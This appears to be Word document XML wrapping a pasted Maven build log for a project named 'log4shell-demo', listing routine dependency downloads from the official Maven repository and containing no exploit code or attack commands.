    <w:p w14:paraId="6BCD7F7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https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/39/commons-parent-39.pom (62 kB at 2.7 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459EFB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https://repo.maven.apache.org/maven2/org/apache/apache/16/apache-16.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2240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https://repo.maven.apache.org/maven2/org/apache/apache/16/apache-16.pom (15 kB at 592 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601800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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/3.0/maven-plugin-api-3.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C58B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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/3.0/maven-model-3.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7CAC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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/2.0.4/plexus-utils-2.0.4.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F3CE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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/3.0/maven-artifact-3.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255054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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/3.0/maven-plugin-api-3.0.jar (49 kB at 2.0 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D7D2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https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-inject-plexus/1.4.2/sisu-inject-plexus-1.4.2.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A0678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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.7.1/plexus-component-annotations-1.7.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAF6C0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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/3.0/maven-artifact-3.0.jar (52 kB at 1.3 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CEEEF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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-classworlds/2.2.3/plexus-classworlds-2.2.3.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B1CD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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/3.0/maven-model-3.0.jar (165 kB at 3.6 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0434C0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https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-inject-bean/1.4.2/sisu-inject-bean-1.4.2.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C707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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.7.1/plexus-component-annotations-1.7.1.jar (4.3 kB at 172 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7A03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https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-guice/2.1.7/sisu-guice-2.1.7-noaop.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FED6C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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/2.0.4/plexus-utils-2.0.4.jar (222 kB at 4.0 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526C4A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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.2.1/maven-shared-utils-3.2.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F62BE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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-classworlds/2.2.3/plexus-classworlds-2.2.3.jar (46 kB at 1.0 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A23C7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https://repo.maven.apache.org/maven2/commons-io/commons-io/2.5/commons-io-2.5.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A1EFB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https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-inject-bean/1.4.2/sisu-inject-bean-1.4.2.jar (153 kB at 2.5 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1475833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https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-inject-plexus/1.4.2/sisu-inject-plexus-1.4.2.jar (202 kB at 2.6 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B38937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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.2.1/maven-shared-utils-3.2.1.jar (167 kB at 2.2 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447F75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https://repo.maven.apache.org/maven2/commons-io/commons-io/2.5/commons-io-2.5.jar (209 kB at 2.7 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C2443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https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-guice/2.1.7/sisu-guice-2.1.7-noaop.jar (472 kB at 5.4 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBFA0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574F4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maven-resources-plugin:3.2.0:resources (default-resources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C54C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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/3.1.0/maven-plugin-api-3.1.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060F20D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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/3.1.0/maven-plugin-api-3.1.0.pom (3.0 kB at 132 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6BB38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https://repo.maven.apache.org/maven2/org/apache/maven/maven/3.1.0/maven-3.1.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D2BF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https://repo.maven.apache.org/maven2/org/apache/maven/maven/3.1.0/maven-3.1.0.pom (22 kB at 991 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B179D9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https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/23/maven-parent-23.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040559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https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/23/maven-parent-23.pom (33 kB at 1.6 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C505D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https://repo.maven.apache.org/maven2/org/apache/apache/13/apache-13.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122C9A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https://repo.maven.apache.org/maven2/org/apache/apache/13/apache-13.pom (14 kB at 665 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5438D6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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/3.1.0/maven-model-3.1.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2386A29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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/3.1.0/maven-model-3.1.0.pom (3.8 kB at 181 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1814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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.0.10/plexus-utils-3.0.10.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D971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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.0.10/plexus-utils-3.0.10.pom (3.1 kB at 150 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D264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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/3.3/plexus-3.3.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736185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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/3.3/plexus-3.3.pom (20 kB at 737 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F41C1F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https://repo.maven.apache.org/maven2/org/sonatype/spice/spice-parent/17/spice-parent-17.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B9FE5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https://repo.maven.apache.org/maven2/org/sonatype/spice/spice-parent/17/spice-parent-17.pom (6.8 kB at 294 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325FF8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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/3.1.0/maven-artifact-3.1.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BDA7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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/3.1.0/maven-artifact-3.1.0.pom (1.6 kB at 74 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CC0F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https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.0.0.M2a/org.eclipse.sisu.plexus-0.0.0.M2a.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33882A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https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.0.0.M2a/org.eclipse.sisu.plexus-0.0.0.M2a.pom (5.9 kB at 210 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C246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https://repo.maven.apache.org/maven2/org/eclipse/sisu/sisu-plexus/0.0.0.M2a/sisu-plexus-0.0.0.M2a.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D15DB8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https://repo.maven.apache.org/maven2/org/eclipse/sisu/sisu-plexus/0.0.0.M2a/sisu-plexus-0.0.0.M2a.pom (7.9 kB at 344 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A92DE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https://repo.maven.apache.org/maven2/javax/enterprise/cdi-api/1.0/cdi-api-1.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F69BBB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https://repo.maven.apache.org/maven2/javax/enterprise/cdi-api/1.0/cdi-api-1.0.pom (1.4 kB at 68 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16549B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https://repo.maven.apache.org/maven2/org/jboss/weld/weld-api-parent/1.0/weld-api-parent-1.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DA92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https://repo.maven.apache.org/maven2/org/jboss/weld/weld-api-parent/1.0/weld-api-parent-1.0.pom (2.4 kB at 118 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3577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https://repo.maven.apache.org/maven2/org/jboss/weld/weld-api-bom/1.0/weld-api-bom-1.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003563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https://repo.maven.apache.org/maven2/org/jboss/weld/weld-api-bom/1.0/weld-api-bom-1.0.pom (7.9 kB at 377 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B23F57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https://repo.maven.apache.org/maven2/org/jboss/weld/weld-parent/6/weld-parent-6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8D3A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https://repo.maven.apache.org/maven2/org/jboss/weld/weld-parent/6/weld-parent-6.pom (21 kB at 828 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0B93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https://repo.maven.apache.org/maven2/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2A621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https://repo.maven.apache.org/maven2/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.pom (1.0 kB at 51 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E031D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https://repo.maven.apache.org/maven2/javax/inject/javax.inject/1/javax.inject-1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1896243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https://repo.maven.apache.org/maven2/javax/inject/javax.inject/1/javax.inject-1.pom (612 B at 28 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F8AF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https://repo.maven.apache.org/maven2/com/google/guava/guava/10.0.1/guava-10.0.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297625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https://repo.maven.apache.org/maven2/com/google/guava/guava/10.0.1/guava-10.0.1.pom (5.4 kB at 245 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348894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https://repo.maven.apache.org/maven2/com/google/guava/guava-parent/10.0.1/guava-parent-10.0.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B33B5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https://repo.maven.apache.org/maven2/com/google/guava/guava-parent/10.0.1/guava-parent-10.0.1.pom (2.0 kB at 85 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F9653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https://repo.maven.apache.org/maven2/com/google/code/findbugs/jsr305/1.3.9/jsr305-1.3.9.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAC76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https://repo.maven.apache.org/maven2/com/google/code/findbugs/jsr305/1.3.9/jsr305-1.3.9.pom (965 B at 44 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395DFF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https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-guice/3.1.0/sisu-guice-3.1.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661393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https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-guice/3.1.0/sisu-guice-3.1.0.pom (10 kB at 406 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1806DA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https://repo.maven.apache.org/maven2/org/sonatype/sisu/inject/guice-parent/3.1.0/guice-parent-3.1.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E6E4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https://repo.maven.apache.org/maven2/org/sonatype/sisu/inject/guice-parent/3.1.0/guice-parent-3.1.0.pom (11 kB at 520 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EB51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https://repo.maven.apache.org/maven2/aopalliance/aopalliance/1.0/aopalliance-1.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B54A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https://repo.maven.apache.org/maven2/aopalliance/aopalliance/1.0/aopalliance-1.0.pom (363 B at 14 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D045A6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https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.0.0.M2a/org.eclipse.sisu.inject-0.0.0.M2a.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0D85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https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.0.0.M2a/org.eclipse.sisu.inject-0.0.0.M2a.pom (5.0 kB at 237 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CA35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https://repo.maven.apache.org/maven2/org/eclipse/sisu/sisu-inject/0.0.0.M2a/sisu-inject-0.0.0.M2a.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2885FF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https://repo.maven.apache.org/maven2/org/eclipse/sisu/sisu-inject/0.0.0.M2a/sisu-inject-0.0.0.M2a.pom (7.8 kB at 355 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B0741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https://repo.maven.apache.org/maven2/asm/asm/3.3.1/asm-3.3.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076250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https://repo.maven.apache.org/maven2/asm/asm/3.3.1/asm-3.3.1.pom (266 B at 13 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C855C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https://repo.maven.apache.org/maven2/asm/asm-parent/3.3.1/asm-parent-3.3.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8F11B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https://repo.maven.apache.org/maven2/asm/asm-parent/3.3.1/asm-parent-3.3.1.pom (4.3 kB at 197 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A7D8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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/2.0.0/plexus-component-annotations-2.0.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461734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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/2.0.0/plexus-component-annotations-2.0.0.pom (750 B at 34 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034B8F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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/2.0.0/plexus-containers-2.0.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C59CB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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/2.0.0/plexus-containers-2.0.0.pom (4.8 kB at 209 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1A22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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/5.1/plexus-5.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AD492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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/5.1/plexus-5.1.pom (23 kB at 1.1 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDCD72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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-classworlds/2.4/plexus-classworlds-2.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063754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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-classworlds/2.4/plexus-classworlds-2.4.pom (3.9 kB at 185 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C373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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/2.0.7/plexus-2.0.7.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4050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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/2.0.7/plexus-2.0.7.pom (17 kB at 786 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4FDF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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/2.1/plexus-utils-2.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454AA4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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/2.1/plexus-utils-2.1.pom (4.0 kB at 139 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA5FA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https://repo.maven.apache.org/maven2/org/sonatype/spice/spice-parent/16/spice-parent-16.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099846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https://repo.maven.apache.org/maven2/org/sonatype/spice/spice-parent/16/spice-parent-16.pom (8.4 kB at 380 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CF55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https://repo.maven.apache.org/maven2/org/sonatype/forge/forge-parent/5/forge-parent-5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A040D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https://repo.maven.apache.org/maven2/org/sonatype/forge/forge-parent/5/forge-parent-5.pom (8.4 kB at 418 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088B57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https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/3.1.0/maven-core-3.1.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B88D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https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/3.1.0/maven-core-3.1.0.pom (6.9 kB at 277 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17079B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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/3.1.0/maven-settings-3.1.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D58E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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/3.1.0/maven-settings-3.1.0.pom (1.8 kB at 76 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D274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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings-builder/3.1.0/maven-settings-builder-3.1.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C4A7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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings-builder/3.1.0/maven-settings-builder-3.1.0.pom (2.3 kB at 103 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575251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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.16/plexus-interpolation-1.16.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1D794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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.16/plexus-interpolation-1.16.pom (1.0 kB at 45 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C1F7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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-components/1.3/plexus-components-1.3.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694D36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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-components/1.3/plexus-components-1.3.pom (3.1 kB at 146 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5230354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https://repo.maven.apache.org/maven2/org/sonatype/plexus/plexus-sec-dispatcher/1.3/plexus-sec-dispatcher-1.3.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E788C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https://repo.maven.apache.org/maven2/org/sonatype/plexus/plexus-sec-dispatcher/1.3/plexus-sec-dispatcher-1.3.pom (3.0 kB at 135 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B035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https://repo.maven.apache.org/maven2/org/sonatype/spice/spice-parent/12/spice-parent-12.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF4B1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https://repo.maven.apache.org/maven2/org/sonatype/spice/spice-parent/12/spice-parent-12.pom (6.8 kB at 272 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59439C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https://repo.maven.apache.org/maven2/org/sonatype/forge/forge-parent/4/forge-parent-4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E775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https://repo.maven.apache.org/maven2/org/sonatype/forge/forge-parent/4/forge-parent-4.pom (8.4 kB at 420 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779C4DA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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.5.5/plexus-utils-1.5.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425C5E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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.5.5/plexus-utils-1.5.5.pom (5.1 kB at 177 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA53C4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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/1.0.11/plexus-1.0.11.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A06CB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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/1.0.11/plexus-1.0.11.pom (9.0 kB at 345 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BEDD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https://repo.maven.apache.org/maven2/org/sonatype/plexus/plexus-cipher/1.4/plexus-cipher-1.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623C5F1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https://repo.maven.apache.org/maven2/org/sonatype/plexus/plexus-cipher/1.4/plexus-cipher-1.4.pom (2.1 kB at 94 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41199F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https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/3.1.0/maven-repository-metadata-3.1.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F02DB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https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/3.1.0/maven-repository-metadata-3.1.0.pom (1.9 kB at 73 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAE396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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model-builder/3.1.0/maven-model-builder-3.1.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DCAAD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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model-builder/3.1.0/maven-model-builder-3.1.0.pom (2.5 kB at 95 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D93AB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https://repo.maven.apache.org/maven2/org/apache/maven/maven-aether-provider/3.1.0/maven-aether-provider-3.1.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0530482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https://repo.maven.apache.org/maven2/org/apache/maven/maven-aether-provider/3.1.0/maven-aether-provider-3.1.0.pom (3.5 kB at 177 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284BE4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https://repo.maven.apache.org/maven2/org/eclipse/aether/aether-api/0.9.0.M2/aether-api-0.9.0.M2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029CB7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https://repo.maven.apache.org/maven2/org/eclipse/aether/aether-api/0.9.0.M2/aether-api-0.9.0.M2.pom (1.7 kB at 58 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51309B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https://repo.maven.apache.org/maven2/org/eclipse/aether/aether/0.9.0.M2/aether-0.9.0.M2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DC96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https://repo.maven.apache.org/maven2/org/eclipse/aether/aether/0.9.0.M2/aether-0.9.0.M2.pom (28 kB at 1.4 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398A2E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https://repo.maven.apache.org/maven2/org/eclipse/aether/aether-spi/0.9.0.M2/aether-spi-0.9.0.M2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052F19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https://repo.maven.apache.org/maven2/org/eclipse/aether/aether-spi/0.9.0.M2/aether-spi-0.9.0.M2.pom (1.8 kB at 70 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE275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https://repo.maven.apache.org/maven2/org/eclipse/aether/aether-util/0.9.0.M2/aether-util-0.9.0.M2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCE094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https://repo.maven.apache.org/maven2/org/eclipse/aether/aether-util/0.9.0.M2/aether-util-0.9.0.M2.pom (2.0 kB at 97 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674687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https://repo.maven.apache.org/maven2/org/eclipse/aether/aether-impl/0.9.0.M2/aether-impl-0.9.0.M2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BB39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https://repo.maven.apache.org/maven2/org/eclipse/aether/aether-impl/0.9.0.M2/aether-impl-0.9.0.M2.pom (3.3 kB at 146 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048E8A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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-classworlds/2.4.2/plexus-classworlds-2.4.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B72D7C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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-classworlds/2.4.2/plexus-classworlds-2.4.2.pom (3.5 kB at 125 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCC67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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/3.0.1/plexus-3.0.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBD99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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/3.0.1/plexus-3.0.1.pom (19 kB at 846 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B08F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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.26/plexus-interpolation-1.26.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7637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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.26/plexus-interpolation-1.26.pom (2.7 kB at 111 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514171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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-filtering/3.2.0/maven-filtering-3.2.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569A33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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-filtering/3.2.0/maven-filtering-3.2.0.pom (6.8 kB at 189 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BD19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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/34/maven-shared-components-34.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1580E5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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/34/maven-shared-components-34.pom (5.1 kB at 255 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDE5A9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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.3.3/maven-shared-utils-3.3.3.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494522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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.3.3/maven-shared-utils-3.3.3.pom (5.8 kB at 175 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3CE6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https://repo.maven.apache.org/maven2/commons-io/commons-io/2.6/commons-io-2.6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475DC18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https://repo.maven.apache.org/maven2/commons-io/commons-io/2.6/commons-io-2.6.pom (14 kB at 548 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D6C9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https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/42/commons-parent-42.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3509F6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https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/42/commons-parent-42.pom (68 kB at 3.2 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A426B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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.3.0/plexus-utils-3.3.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412BDF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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.3.0/plexus-utils-3.3.0.pom (5.2 kB at 185 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3BEA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https://repo.maven.apache.org/maven2/org/sonatype/plexus/plexus-build-api/0.0.7/plexus-build-api-0.0.7.pom</w:t>
      </w:r>
    </w:p>
